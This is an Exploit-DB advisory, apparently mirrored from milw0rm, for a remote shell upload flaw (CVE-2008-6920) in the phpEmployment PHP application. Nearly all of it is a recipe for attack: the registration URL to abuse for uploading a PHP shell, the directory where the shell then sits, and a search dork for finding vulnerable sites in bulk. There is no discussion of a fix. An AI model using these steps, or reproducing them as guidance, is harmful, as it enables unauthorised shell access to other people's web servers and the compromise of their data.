phpEmployment php upload Arbitrary File Upload Vulnerability

2008-12-23T00:00:00
ID EDB-ID:7563
Type exploitdb
Reporter ahmadbady
Modified 2008-12-23T00:00:00

Description

phpEmployment (php upload) Arbitrary File Upload Vulnerability. CVE-2008-6920. Webapps exploit for php platform

                                        
                                            ****(remote shell upload)****

script: phpEmployment
   
***************************************************************************
download from:http://www.w2b.ru/download/phpEmployment.zip
   
***************************************************************************
www.site.com/path/auth.php?mode=regnew&adtype=job

shell: www.site.com/path/photoes/number_shell.php

----------------------------------------------------------------------------------------
dork:"powered by phpEmployment"
------------------------------------------------------------------------------------------  
**************************************************


Author: ahmadbady 

**************************************************

# milw0rm.com [2008-12-23]